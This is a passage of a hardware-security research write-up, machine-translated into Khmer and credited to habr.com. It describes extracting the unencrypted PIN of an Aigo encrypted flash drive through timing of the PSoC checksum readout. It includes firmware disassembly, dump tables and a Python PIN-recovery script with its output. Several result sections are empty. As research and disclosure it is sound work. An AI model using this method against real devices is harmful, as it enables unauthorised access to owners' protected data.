ដែលត្រូវបាននិយាយថាយើងមានបញ្ហាមួយ: ចាប់តាំងពីយើងកំពុងដំណើរការជាមួយ checksum ពិតប្រាកដ បៃ null មិនផ្លាស់ប្តូរតម្លៃដែលបានអានទេ។ ទោះយ៉ាងណាក៏ដោយ ដោយសារដំណើរការគណនាទាំងមូល (8192 បៃ) ចំណាយពេល 0,1478 វិនាទី (ជាមួយនឹងការប្រែប្រួលបន្តិចបន្តួចរាល់ពេលដែលវាដំណើរការ) ដែលស្មើនឹងប្រមាណ 18,04 μs ក្នុងមួយបៃ យើងអាចប្រើពេលវេលានេះដើម្បីពិនិត្យមើលតម្លៃ checksum នៅពេលសមស្រប។ សម្រាប់ការរត់លើកដំបូង អ្វីគ្រប់យ៉ាងត្រូវបានអានយ៉ាងងាយស្រួល ព្រោះថារយៈពេលនៃដំណើរការគណនាគឺតែងតែដូចគ្នា ទោះជាយ៉ាងណាក៏ដោយ ការបញ្ចប់នៃការបោះចោលនេះគឺមិនសូវត្រឹមត្រូវទេ ពីព្រោះ "គម្លាតពេលវេលាតិចតួច" លើការរត់នីមួយៗ បន្ថែមទៅភាពសំខាន់៖

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

នោះគឺជាការបោះចោលចំនួន 10 សម្រាប់រាល់ការពន្យារពេលមីក្រូវិនាទី។ ពេលវេលាប្រតិបត្តិការសរុបសម្រាប់ការបោះចោល 8192 បៃនៃ flash drive គឺប្រហែល 48 ម៉ោង។

៧.៣. ការកសាងប្រព័ន្ធគោលពីរ Flash

ខ្ញុំមិនទាន់បានបញ្ចប់ការសរសេរកូដដែលនឹងបង្កើតឡើងវិញទាំងស្រុងនូវកូដកម្មវិធីនៃ flash drive ដោយគិតគូរពីគម្លាតគ្រប់ពេលវេលា។ ទោះយ៉ាងណាក៏ដោយ ខ្ញុំបានស្ដារការចាប់ផ្តើមនៃកូដនេះរួចហើយ។ ដើម្បី​ប្រាកដ​ថា​ខ្ញុំ​បាន​ធ្វើ​វា​បាន​ត្រឹមត្រូវ ខ្ញុំ​បាន​រុះរើ​វា​ដោយ​ប្រើ m8cdis៖

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

មើលទៅទំនងណាស់!

៧.៤. ស្វែងរកអាសយដ្ឋានផ្ទុកកូដ PIN

ឥឡូវនេះយើងអាចអានមូលប្បទានប័ត្រនៅពេលយើងត្រូវការ យើងអាចពិនិត្យមើលយ៉ាងងាយស្រួលពីរបៀប និងកន្លែងដែលវាផ្លាស់ប្តូរនៅពេលដែលយើង:

• បញ្ចូលលេខកូដ PIN ខុស;
• ផ្លាស់ប្តូរលេខសម្ងាត់។

ជាដំបូង ដើម្បីស្វែងរកអាសយដ្ឋានផ្ទុកប្រហាក់ប្រហែល ខ្ញុំបានយក checksum dump នៅក្នុងការបង្កើន 10 ms បន្ទាប់ពីការចាប់ផ្ដើមឡើងវិញ។ បន្ទាប់មកខ្ញុំបានបញ្ចូលកូដ PIN ខុស ហើយធ្វើដូចគ្នា។

លទ្ធផល​មិន​សូវ​សប្បាយ​ចិត្ត​ទេ ព្រោះ​មាន​ការ​ផ្លាស់​ប្តូរ​ជា​ច្រើន។ ប៉ុន្តែនៅទីបញ្ចប់ខ្ញុំអាចកំណត់បានថា checksum បានផ្លាស់ប្តូរកន្លែងណាមួយរវាង 120000 µs និង 140000 µs នៃការពន្យាពេល។ ប៉ុន្តែ "កូដ PIN" ដែលខ្ញុំបង្ហាញនៅទីនោះគឺមិនត្រឹមត្រូវទាំងស្រុង - ដោយសារតែវត្ថុបុរាណនៃដំណើរការពន្យាពេលMicrosconds ដែលធ្វើរឿងចម្លែកនៅពេលដែល 0 ត្រូវបានបញ្ជូនទៅវា។

បន្ទាប់មកបន្ទាប់ពីចំណាយពេលជិត 3 ម៉ោង ខ្ញុំចាំបានថាប្រព័ន្ធ SROM ហៅ CheckSum ទទួលបានអាគុយម៉ង់ជាការបញ្ចូលដែលបញ្ជាក់ចំនួនប្លុកសម្រាប់ checksum! នោះ។ យើងអាចធ្វើមូលដ្ឋានីយកម្មអាសយដ្ឋានផ្ទុកកូដ PIN និងបញ្ជរ "ការប៉ុនប៉ងមិនត្រឹមត្រូវ" យ៉ាងងាយស្រួល ជាមួយនឹងភាពត្រឹមត្រូវរហូតដល់ប្លុក 64 បៃ។

ការរត់ដំបូងរបស់ខ្ញុំ ទទួលបានលទ្ធផលដូចខាងក្រោម៖

បន្ទាប់មកខ្ញុំបានប្តូរលេខកូដ PIN ពី "123456" ទៅ "1234567" ហើយទទួលបាន:

ដូច្នេះ កូដ PIN និងបញ្ជរនៃការប៉ុនប៉ងមិនត្រឹមត្រូវហាក់ដូចជាត្រូវបានរក្សាទុកនៅក្នុងប្លុកលេខ 126។

៧.៥. ការ​បោះ​ចោល​ប្លុក​លេខ ១២៦

ប្លុក #126 គួរតែស្ថិតនៅកន្លែងណាមួយជុំវិញ 125x64x18 = 144000μs ចាប់ពីការចាប់ផ្តើមនៃការគណនា checksum នៅក្នុងកន្លែងចាក់សំរាមពេញលេញរបស់ខ្ញុំ ហើយវាមើលទៅអាចជឿជាក់បាន។ បន្ទាប់មក បន្ទាប់ពីធ្វើការរុះរើកន្លែងចាក់សំរាមមិនត្រឹមត្រូវជាច្រើនដោយដៃ (ដោយសារតែការប្រមូលផ្តុំនៃ "គម្លាតពេលវេលាតិចតួច") ខ្ញុំបានបញ្ចប់ការទទួលបានបៃទាំងនេះ (នៅភាពយឺតនៃ 145527 μs):

វាច្បាស់ណាស់ថាលេខកូដ PIN ត្រូវបានរក្សាទុកក្នុងទម្រង់ដែលមិនបានអ៊ិនគ្រីប! ជាការពិតណាស់ តម្លៃទាំងនេះមិនត្រូវបានសរសេរនៅក្នុងកូដ ASCII នោះទេ ប៉ុន្តែដូចដែលវាប្រែចេញ វាឆ្លុះបញ្ចាំងពីការអានដែលយកចេញពីក្តារចុច capacitive ។

ជាចុងក្រោយ ខ្ញុំបានដំណើរការការសាកល្បងមួយចំនួនទៀត ដើម្បីស្វែងរកកន្លែងដែលឧបករណ៍រាប់ការប៉ុនប៉ងមិនល្អត្រូវបានរក្សាទុក។ នេះជាលទ្ធផល៖

0xFF - មានន័យថា "ការប៉ុនប៉ង 15 ដង" ហើយវាថយចុះជាមួយនឹងការប៉ុនប៉ងបរាជ័យនីមួយៗ។

៧.៦. ការស្តារកូដ PIN

នេះ​ជា​កូដ​អាក្រក់​របស់​ខ្ញុំ​ដែល​ដាក់​បញ្ចូល​គ្នា​ខាង​លើ៖

def dump_pin():
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  for delay in range(145495, 145719, 16):
    csum = csum_at(delay, 1)
    byte = (csum-last_csum)&0xFF
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:
      print pin_map[pin_bytes[i]],
  print

នេះជាលទ្ធផលនៃការអនុវត្តរបស់វា៖

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

ហ៊ឺយ! ធ្វើការ!

សូមចំណាំថាតម្លៃនៃភាពយឺតយ៉ាវដែលខ្ញុំបានប្រើទំនងជាពាក់ព័ន្ធទៅនឹង PSoC ជាក់លាក់មួយ - តម្លៃដែលខ្ញុំបានប្រើ។

8. តើមានអ្វីបន្ទាប់?

ដូច្នេះសូមសង្ខេបនៅលើផ្នែក PSoC នៅក្នុងបរិបទនៃដ្រាយ Aigo របស់យើង:

• យើងអាចអាន SRAM ទោះបីវាត្រូវបានការពារក៏ដោយ
• យើងអាចជៀសផុតពីការការពារប្រឆាំងនឹងការអូសដោយប្រើការវាយលុកតាមដានការចាប់ផ្ដើមត្រជាក់ និងការអានកូដ PIN ដោយផ្ទាល់។

ទោះជាយ៉ាងណាក៏ដោយ ការវាយប្រហាររបស់យើងមានគុណវិបត្តិមួយចំនួនដោយសារបញ្ហានៃការធ្វើសមកាលកម្ម។ វាអាចត្រូវបានកែលម្អដូចខាងក្រោមៈ

• សរសេរឧបករណ៍ប្រើប្រាស់ដើម្បីឌិកូដទិន្នន័យលទ្ធផលបានត្រឹមត្រូវ ដែលទទួលបានជាលទ្ធផលនៃការវាយប្រហារ "cold boot trace" ។
• ប្រើឧបករណ៍ FPGA ដើម្បីបង្កើតការពន្យារពេលពេលវេលាច្បាស់លាស់បន្ថែមទៀត (ឬប្រើកម្មវិធីកំណត់ម៉ោងផ្នែករឹង Arduino);
• សាកល្បងការវាយប្រហារមួយផ្សេងទៀត៖ បញ្ចូលកូដ PIN មិនត្រឹមត្រូវដោយចេតនា ចាប់ផ្ដើមឡើងវិញ និងបោះបង់ RAM ដោយសង្ឃឹមថាលេខកូដ PIN ត្រឹមត្រូវនឹងត្រូវបានរក្សាទុកក្នុង RAM សម្រាប់ការប្រៀបធៀប។ ទោះជាយ៉ាងណាក៏ដោយ នេះមិនមែនជាការងាយស្រួលទេក្នុងការធ្វើនៅលើ Arduino ចាប់តាំងពីកម្រិតសញ្ញា Arduino គឺ 5 វ៉ុល ខណៈដែលបន្ទះដែលយើងកំពុងពិនិត្យមើលដំណើរការជាមួយនឹងសញ្ញា 3,3 វ៉ុល។

រឿងគួរឱ្យចាប់អារម្មណ៍មួយដែលអាចត្រូវបានសាកល្បងគឺការលេងជាមួយកម្រិតវ៉ុលដើម្បីរំលងការការពារការអាន។ ប្រសិនបើវិធីសាស្រ្តនេះដំណើរការ យើងនឹងអាចទទួលបានទិន្នន័យត្រឹមត្រូវពី flash drive ជំនួសឱ្យការពឹងផ្អែកលើការអាន checksum ជាមួយនឹងពេលវេលាមិនច្បាស់លាស់។

ដោយសារ SROM ប្រហែលជាអានឆ្មាំតាមរយៈការហៅប្រព័ន្ធ ReadBlock យើងអាចធ្វើដូចគ្នា បានពិពណ៌នា នៅលើប្លុករបស់ Dmitry Nedospasov - ការអនុវត្តឡើងវិញនៃការវាយប្រហាររបស់ Chris Gerlinski បានប្រកាសនៅក្នុងសន្និសីទ "REcon Brussels 2017".

ភាពរីករាយមួយទៀតដែលអាចធ្វើបានគឺការកិនករណីចេញពីបន្ទះឈីប៖ ដើម្បីយក SRAM dump កំណត់អត្តសញ្ញាណការហៅទូរសព្ទតាមប្រព័ន្ធដែលមិនមានឯកសារ និងភាពងាយរងគ្រោះ។

9 ។ សេចក្តីសន្និដ្ឋាន

ដូច្នេះ ការការពារដ្រាយវ៍នេះ ទុកឱ្យមានការចង់បានច្រើន ព្រោះវាប្រើ microcontroller ធម្មតា (មិនមែន "រឹង") ដើម្បីរក្សាទុកកូដ PIN... លើសពីនេះ ខ្ញុំមិនទាន់បានមើល (នៅឡើយ) ថាតើអ្វីៗដំណើរការជាមួយទិន្នន័យ ការអ៊ិនគ្រីបនៅលើឧបករណ៍នេះ!

តើអ្នកអាចណែនាំអ្វីខ្លះសម្រាប់ Aigo? បន្ទាប់ពីការវិភាគគំរូមួយចំនួននៃដ្រាយ HDD ដែលបានអ៊ិនគ្រីបនៅឆ្នាំ 2015 ខ្ញុំបានធ្វើ បទ​បង្ហាញ នៅលើ SyScan ដែលក្នុងនោះគាត់បានពិនិត្យមើលបញ្ហាសុវត្ថិភាពនៃដ្រាយ HDD ខាងក្រៅជាច្រើន ហើយបានធ្វើការណែនាំអំពីអ្វីដែលអាចត្រូវបានកែលម្អនៅក្នុងពួកវា។ 🙂

ខ្ញុំបានចំណាយពេលពីរចុងសប្តាហ៍ និងពេលល្ងាចជាច្រើនដើម្បីធ្វើការស្រាវជ្រាវនេះ។ សរុបប្រហែល 40 ម៉ោង។ រាប់តាំងពីដើមដំបូង (ពេលខ្ញុំបើកឌីស) ដល់ចប់ (ចាក់កូដ PIN) ។ 40 ម៉ោងដូចគ្នានេះរួមបញ្ចូលទាំងពេលវេលាដែលខ្ញុំបានចំណាយក្នុងការសរសេរអត្ថបទនេះ។ វា​ជា​ការ​ធ្វើ​ដំណើរ​ដ៏​រំភើប​មួយ​។

ប្រភព: www.habr.com